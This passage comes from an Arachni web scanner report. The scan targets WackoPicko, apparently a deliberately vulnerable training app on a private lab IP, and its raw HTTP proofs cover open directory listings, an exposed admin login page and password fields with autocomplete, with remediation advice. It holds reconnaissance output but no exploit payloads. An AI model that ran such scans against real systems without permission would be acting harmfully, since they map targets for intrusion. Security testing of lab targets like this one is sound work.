    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Proof
HTTP/1.1 200 OK
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/users/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:49 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 519
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /WackoPicko/users</title>
 </head>
 <body>
<h1>Index of /WackoPicko/users</h1>
<table><tr><th><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr><tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[DIR]"></td><td><a href="/WackoPicko/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="check_pass.php">check_pass.php</a></td><td align="right">17-May-2011 21:25  </td><td align="right">584 </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="home.php">home.php</a></td><td align="right">17-May-2011 21:25  </td><td align="right">1.6K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="login.php">login.php</a></td><td align="right">17-May-2011 21:25  </td><td align="right">1.3K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="logout.php">logout.php</a></td><td align="right">17-May-2011 21:25  </td><td align="right">176 </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="register.php">register.php</a></td><td align="right">17-May-2011 21:25  </td><td align="right">1.9K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="sample.php">sample.php</a></td><td align="right">17-May-2011 21:25  </td><td align="right">125 </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="similar.php">similar.php</a></td><td align="right">17-May-2011 21:25  </td><td align="right">778 </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="view.php">view.php</a></td><td align="right">17-May-2011 21:25  </td><td align="right">833 </td><td>&nbsp;</td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
</body></html>
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Proof
HTTP/1.1 200 OK
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/css/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:48 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 454
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /WackoPicko/css</title>
 </head>
 <body>
<h1>Index of /WackoPicko/css</h1>
<table><tr><th><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr><tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[DIR]"></td><td><a href="/WackoPicko/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="blueprint/">blueprint/</a></td><td align="right">17-May-2011 21:25  </td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="stylings.css">stylings.css</a></td><td align="right">17-May-2011 21:25  </td><td align="right">3.0K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="stylings.php">stylings.php</a></td><td align="right">17-May-2011 21:25  </td><td align="right">3.2K</td><td>&nbsp;</td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
</body></html>
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   

Common administration interface 1 common_admin_interfaces

An administration interface was identified and should be reviewed.

Remediation guidance

Access to administration interfaces should be restricted to trusted IP addresses only.

Proof
HTTP/1.1 301 Moved Permanently
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/users/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 301 Moved Permanently
Date: Mon, 06 Aug 2018 22:49:51 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Location: http://192.168.0.26/WackoPicko/users/
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 204
Content-Type: text/html; charset=iso-8859-1

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:51 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 519
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /WackoPicko/users</title>
 </head>
 <body>
<h1>Index of /WackoPicko/users</h1>
<table><tr><th><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr><tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[DIR]"></td><td><a href="/WackoPicko/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="check_pass.php">check_pass.php</a></td><td align="right">17-May-2011 21:25  </td><td align="right">584 </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="home.php">home.php</a></td><td align="right">17-May-2011 21:25  </td><td align="right">1.6K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="login.php">login.php</a></td><td align="right">17-May-2011 21:25  </td><td align="right">1.3K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="logout.php">logout.php</a></td><td align="right">17-May-2011 21:25  </td><td align="right">176 </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="register.php">register.php</a></td><td align="right">17-May-2011 21:25  </td><td align="right">1.9K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="sample.php">sample.php</a></td><td align="right">17-May-2011 21:25  </td><td align="right">125 </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="similar.php">similar.php</a></td><td align="right">17-May-2011 21:25  </td><td align="right">778 </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="view.php">view.php</a></td><td align="right">17-May-2011 21:25  </td><td align="right">833 </td><td>&nbsp;</td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
</body></html>
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   

Password field with auto-complete 4 password_autocomplete

In typical form-based web applications, it is common practice for developers to allow autocomplete within the HTML form to improve the usability of the page. With autocomplete enabled (default), the browser is allowed to cache previously entered form values.

For legitimate purposes, this allows the user to quickly re-enter the same data when completing the form multiple times.

When autocomplete is enabled on either/both the username and password fields, this could allow a cyber-criminal with access to the victim’s computer the ability to have the victim’s credentials automatically entered as the cyber-criminal visits the affected page.

Arachni has discovered that the affected page contains a form containing a password field that has not disabled autocomplete.

Remediation guidance

The autocomplete value can be configured in two different locations.

The first and most secure location is to disable the autocomplete attribute on the <form> HTML tag. This will disable autocomplete for all inputs within that form. An example of disabling autocomplete within the form tag is <form autocomplete=off>.

The second slightly less desirable option is to disable the autocomplete attribute for a specific <input> HTML tag. While this may be the less desired solution from a security perspective, it may be preferred method for usability reasons, depending on size of the form. An example of disabling the autocomplete attribute within a password input tag is <input type=password autocomplete=off>.

0
1
2
3
4
5
6
7
8
9
10
11
12
13
<form action="/WackoPicko/admin/index.php?page=login" method="POST">
  Username :
  <input type="text" name="adminname">
  </input>
  <br>
  </br>
  Password :
  <input type="password" name="password">
  </input>
  <br>
  </br>
  <input type="submit" value="submit">
  </input>
</form>
Type In Action Default inputs Updated inputs
form http://192.168.0.26/WackoPicko/admin/index.php?page=login http://192.168.0.26/WackoPicko/admin/index.php?page=login
adminname
password
adminname
password
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/admin/index.php?page=login HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:44 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 186
Content-Type: text/html


   <h2>Admin Area</h2>
  <form action="/WackoPicko/admin/index.php?page=login" method="POST">
       Username : <input type="text" name="adminname" /><br>
       Password : <input type="password" name="password" /><br>
       <input type="submit" value="submit" />
   </form>
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/admin/index.php?page=login HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:44 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 186
Content-Type: text/html


   <h2>Admin Area</h2>
  <form action="/WackoPicko/admin/index.php?page=login" method="POST">
       Username : <input type="text" name="adminname" /><br>
       Password : <input type="password" name="password" /><br>
       <input type="submit" value="submit" />
   </form>
0
1
2
3
4
5
6
7
8
9
10
<form action="/WackoPicko/passcheck.php" method="POST">
  Password to check:
  <br>
  </br>
  <input type="password" name="password">
  </input>
  <br>
  </br>
  <input type="submit" value="Check!">
  </input>
</form>
Type In Action Default inputs Updated inputs
form http://192.168.0.26/WackoPicko/passcheck.php http://192.168.0.26/WackoPicko/passcheck.php
password
password
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/passcheck.php HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=d5mejo5kr6efhtf1dlak7b04m1

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:55:10 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 910
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
